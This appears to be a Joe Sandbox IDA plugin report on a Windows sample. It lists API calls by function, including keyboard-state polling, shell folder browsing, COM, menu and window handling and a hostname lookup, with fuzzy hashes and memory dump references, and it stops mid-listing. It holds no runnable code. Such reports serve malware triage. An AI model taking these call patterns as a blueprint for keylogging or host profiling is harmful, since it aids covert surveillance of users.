                                                                        • Instruction ID: 8ee5b93cd1bd0a396f81083b2f1e45aaef4ec8a23f9760dc370131641b196ca7
                                                                        • Opcode Fuzzy Hash: 9e67a7e32b0bee191ca6813ecc4f9f5eb90373b8932cd945394ef654ed0c6ce6
                                                                        • Instruction Fuzzy Hash: F9216FB122D209BFE7149BA0ED89B2A7FB9FF84768F408114F50A92162CB714D40FF20
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • CoInitialize.OLE32(00000000), ref: 0094034B
                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009403DE
                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 009403F2
                                                                        • CoCreateInstance.OLE32(0097DA8C,00000000,00000001,009A3CF8,?), ref: 0094043E
                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009404AD
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00940505
                                                                        • _memset.LIBCMT ref: 00940542
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0094057E
                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009405A1
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 009405A8
                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009405DF
                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 009405E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                        • String ID:
                                                                        • API String ID: 1246142700-0
                                                                        • Opcode ID: cea67faeebb66ed9db08e94883124381ed5c27132a38dcab5ceb1ea85a0b03a1
                                                                        • Instruction ID: 523d1016e4a1589f50b33f6612b9c97c169becdd340a261f3d4c2144072ee8d3
                                                                        • Opcode Fuzzy Hash: cea67faeebb66ed9db08e94883124381ed5c27132a38dcab5ceb1ea85a0b03a1
                                                                        • Instruction Fuzzy Hash: ABB1C975A00209AFDB14DFA5C889DAEBBB9FF88314B148459F909EB251DB70EE41CF50
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00932ED6
                                                                        • SetKeyboardState.USER32(?), ref: 00932F41
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00932F61
                                                                        • GetKeyState.USER32(000000A0), ref: 00932F78
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00932FA7
                                                                        • GetKeyState.USER32(000000A1), ref: 00932FB8
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00932FE4
                                                                        • GetKeyState.USER32(00000011), ref: 00932FF2
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0093301B
                                                                        • GetKeyState.USER32(00000012), ref: 00933029
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00933052
                                                                        • GetKeyState.USER32(0000005B), ref: 00933060
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 431237c86c7302f7494ac69a7d6b3bb214b8233c13ce8afd3d686f0d1c2f887e
                                                                        • Instruction ID: fcf24633fda9a17fa6328f8dab0db707399f79406eb800e6066a7db88a9b0b20
                                                                        • Opcode Fuzzy Hash: 431237c86c7302f7494ac69a7d6b3bb214b8233c13ce8afd3d686f0d1c2f887e
                                                                        • Instruction Fuzzy Hash: B951E934A0879429FB35DBB488517EABFF85F11340F08859DD5C25A1C2DA54AB8CCFA2
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 0092ED1E
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0092ED30
                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0092ED8E
                                                                        • GetDlgItem.USER32(?,00000002), ref: 0092ED99
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0092EDAB
                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0092EE01
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0092EE0F
                                                                        • GetWindowRect.USER32(00000000,?), ref: 0092EE20
                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0092EE63
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0092EE71
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0092EE8E
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0092EE9B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: a4d8d26d47129ba1be2a56e3eb8fc429d3c4b6b893702a1bf751fd9404f9acbf
                                                                        • Instruction ID: b0a327a995a526278e877d712c98af381a9d62fabdfc5ec0e37292691babb4f3
                                                                        • Opcode Fuzzy Hash: a4d8d26d47129ba1be2a56e3eb8fc429d3c4b6b893702a1bf751fd9404f9acbf
                                                                        • Instruction Fuzzy Hash: 35513FB1B10205AFDB18DF68DD85AAEBBBAFF88710F148129F519E7294D7709D408B10
                                                                        APIs
                                                                          • Part of subcall function 0090B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0090B759,?,00000000,?,?,?,?,0090B72B,00000000,?), ref: 0090BA58
                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0090B72B), ref: 0090B7F6
                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0090B72B,00000000,?,?,0090B2EF,?,?), ref: 0090B88D
                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0096D8A6
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0090B72B,00000000,?,?,0090B2EF,?,?), ref: 0096D8D7
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0090B72B,00000000,?,?,0090B2EF,?,?), ref: 0096D8EE
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0090B72B,00000000,?,?,0090B2EF,?,?), ref: 0096D90A
                                                                        • DeleteObject.GDI32(00000000), ref: 0096D91C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 641708696-0
                                                                        • Opcode ID: 8244897a99711a7255b955ee71b3e8a87e54e9cf2f0d8adb2188dff86d4844dc
                                                                        • Instruction ID: 3353d6fba15156a43f307916bdb1ecba051724c8cd97b9d20484589099546b8e
                                                                        • Opcode Fuzzy Hash: 8244897a99711a7255b955ee71b3e8a87e54e9cf2f0d8adb2188dff86d4844dc
                                                                        • Instruction Fuzzy Hash: 35619C31A26700DFDB259F18DA98B25B7F9FF95325F24461EE45686AB0C734A880EF40
                                                                        APIs
                                                                          • Part of subcall function 0090B526: GetWindowLongW.USER32(?,000000EB), ref: 0090B537
                                                                        • GetSysColor.USER32(0000000F), ref: 0090B438
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ColorLongWindow
                                                                        • String ID:
                                                                        • API String ID: 259745315-0
                                                                        • Opcode ID: dea6a50cb55570e08c8b8531238c69d23499aa9f9b1370f7a9fa181d2f8fa3ab
                                                                        • Instruction ID: 740df341bdeab9b0b4af23181da2588bc99dd43b45f10ad2022f139bd95c3606
                                                                        • Opcode Fuzzy Hash: dea6a50cb55570e08c8b8531238c69d23499aa9f9b1370f7a9fa181d2f8fa3ab
                                                                        • Instruction Fuzzy Hash: D641B132109104AFDB255F28DC89BBD3B69AF46730F584261FD698E1F6D7318D81E721
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 136442275-0
                                                                        • Opcode ID: c7aa46960a924e7c6978b065ee1ced5d23698406442a406f2abc60d24fe441de
                                                                        • Instruction ID: a8cae9f8f64b0c758cc144d03a4b886f47381b7fb3ef9496fe59d4558cb20fcb
                                                                        • Opcode Fuzzy Hash: c7aa46960a924e7c6978b065ee1ced5d23698406442a406f2abc60d24fe441de
                                                                        • Instruction Fuzzy Hash: 9D41217694511CAEDF61EB90DC45ECAB3BCEB84300F1041A6B659E2051EF71A7E58F50
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(0098DC00,0098DC00,0098DC00), ref: 0093D7CE
                                                                        • GetDriveTypeW.KERNEL32(?,009A3A70,00000061), ref: 0093D898
                                                                        • _wcscpy.LIBCMT ref: 0093D8C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 2820617543-1000479233
                                                                        • Opcode ID: 33fad440473e03b14804fe08e34df5cf26d27e10ff238be8eb6d2fd4053749e1
                                                                        • Instruction ID: 431ae8a463adab6ba35afeffd8d11b93e23150cb9ef0f17ef37453ee1982de1b
                                                                        • Opcode Fuzzy Hash: 33fad440473e03b14804fe08e34df5cf26d27e10ff238be8eb6d2fd4053749e1
                                                                        • Instruction Fuzzy Hash: A5516F35205304AFD714EF14E892B6AB7B5FF85314F10892DF59A972A2DB31EE05CA82
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 008F93AB
                                                                        • __itow.LIBCMT ref: 008F93DF
                                                                          • Part of subcall function 00911557: _xtow@16.LIBCMT ref: 00911578
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf_xtow@16
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 1502193981-2263619337
                                                                        • Opcode ID: 2411fe636c524bb542180fae5fcd058dd2ce13f476723f046990f8ed706f41c3
                                                                        • Instruction ID: c5c970838b189951d0f49023708f77f97628163456b2b620690fe43ce9ed4782
                                                                        • Opcode Fuzzy Hash: 2411fe636c524bb542180fae5fcd058dd2ce13f476723f046990f8ed706f41c3
                                                                        • Instruction Fuzzy Hash: BA41A27160420DEBDB249F78D942FBA77E8FB84304F20446AE689D72D1EA359A41CB51
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0095A259
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0095A260
                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0095A273
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0095A27B
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0095A286
                                                                        • DeleteDC.GDI32(00000000), ref: 0095A28F
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0095A299
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0095A2AD
                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0095A2B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                        • String ID: static
                                                                        • API String ID: 2559357485-2160076837
                                                                        • Opcode ID: b75d5c296f4c109aeac5f95849171a1aa7f944b685884b843a7399c3090eeda5
                                                                        • Instruction ID: e7b310f5af3844ee781b3c216d9c80ce6b21fff3e4bf7173086d820ac60749dd
                                                                        • Opcode Fuzzy Hash: b75d5c296f4c109aeac5f95849171a1aa7f944b685884b843a7399c3090eeda5
                                                                        • Instruction Fuzzy Hash: 75318D32115218ABDF119FA5DC4AFEA3B7DFF09761F100314FA29A60A0C736D855EBA4
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 2620052-3771769585
                                                                        • Opcode ID: 6f7c404f49635d1a6a606b3e63f001be47a26e35cdb91bcb8345a76517e2349e
                                                                        • Instruction ID: 6369b1b016ea9a653f2d7f7bfb4230352451e80e9aabd8fec06ae9684a47480f
                                                                        • Opcode Fuzzy Hash: 6f7c404f49635d1a6a606b3e63f001be47a26e35cdb91bcb8345a76517e2349e
                                                                        • Instruction Fuzzy Hash: E611B776508219BFCB246B60AC4AFEA77BCDF80710F004065F149A6091EF75DAC59B50
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00915047
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • __gmtime64_s.LIBCMT ref: 009150E0
                                                                        • __gmtime64_s.LIBCMT ref: 00915116
                                                                        • __gmtime64_s.LIBCMT ref: 00915133
                                                                        • __allrem.LIBCMT ref: 00915189
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009151A5
                                                                        • __allrem.LIBCMT ref: 009151BC
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009151DA
                                                                        • __allrem.LIBCMT ref: 009151F1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0091520F
                                                                        • __invoke_watson.LIBCMT ref: 00915280
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                        • String ID:
                                                                        • API String ID: 384356119-0
                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                        • Instruction ID: 94e07e8d91465fc1bdd3048d8986ffa5a164aa0a5231471edb85a594ba6682b9
                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                        • Instruction Fuzzy Hash: D5710676B00B1AEBD714AF68DC41BEAB3A8AF94764F164629F414D6281E770D9C08BD0
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00934DF8
                                                                        • GetMenuItemInfoW.USER32(009B1708,000000FF,00000000,00000030), ref: 00934E59
                                                                        • SetMenuItemInfoW.USER32(009B1708,00000004,00000000,00000030), ref: 00934E8F
                                                                        • Sleep.KERNEL32(000001F4), ref: 00934EA1
                                                                        • GetMenuItemCount.USER32(?), ref: 00934EE5
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00934F01
                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00934F2B
                                                                        • GetMenuItemID.USER32(?,?), ref: 00934F70
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00934FB6
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00934FCA
                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00934FEB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                        • String ID:
                                                                        • API String ID: 4176008265-0
                                                                        • Opcode ID: e565de194c345943c30ed96ff4b19c4705a20c49e89d431f430e9ed46de28080
                                                                        • Instruction ID: e9c4a4ba15ec9aed47a24a4e595ee7a462b83bf546b8257b5b92eaed99770e78
                                                                        • Opcode Fuzzy Hash: e565de194c345943c30ed96ff4b19c4705a20c49e89d431f430e9ed46de28080
                                                                        • Instruction Fuzzy Hash: 2961AB71A04249AFDB20CFA4D988AAE7BB8FB45308F1A0559F806A7251E731BD44DF21
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00959C98
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00959C9B
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00959CBF
                                                                        • _memset.LIBCMT ref: 00959CD0
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00959CE2
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00959D5A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 830647256-0
                                                                        • Opcode ID: c34960cf6cee656947d7406e3174a132e6f662a0e788213c99bb7a79302951e8
                                                                        • Instruction ID: 901b6a8915dabb265fe5e0b4d0c14afb090218b2fccee7c1f470d27dd8ea8310
                                                                        • Opcode Fuzzy Hash: c34960cf6cee656947d7406e3174a132e6f662a0e788213c99bb7a79302951e8
                                                                        • Instruction Fuzzy Hash: 3C617B75A00208EFEB20DFA8CC81EEE77B8EF49714F14415AFE08A7291D774A945DB50
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009294FE
                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00929549
                                                                        • VariantInit.OLEAUT32(?), ref: 0092955B
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0092957B
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 009295BE
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 009295D2
                                                                        • VariantClear.OLEAUT32(?), ref: 009295E7
                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 009295F4
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009295FD
                                                                        • VariantClear.OLEAUT32(?), ref: 0092960F
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0092961A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: 62396123e8a58b364bb5f2ed6519b54fa76d7902383ab2e6783e2b7e2dc50e66
                                                                        • Instruction ID: f7cee13bf630ef65863058532214b9c140c5e1f69e498711deac05bbe84cb186
                                                                        • Opcode Fuzzy Hash: 62396123e8a58b364bb5f2ed6519b54fa76d7902383ab2e6783e2b7e2dc50e66
                                                                        • Instruction Fuzzy Hash: 6A414171E14219AFCB01EFA4D848DDEBBB9FF48354F008065F905A3261DB31EA85DBA1
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • CoInitialize.OLE32 ref: 0094ADF6
                                                                        • CoUninitialize.OLE32 ref: 0094AE01
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,0097D8FC,?), ref: 0094AE61
                                                                        • IIDFromString.OLE32(?,?), ref: 0094AED4
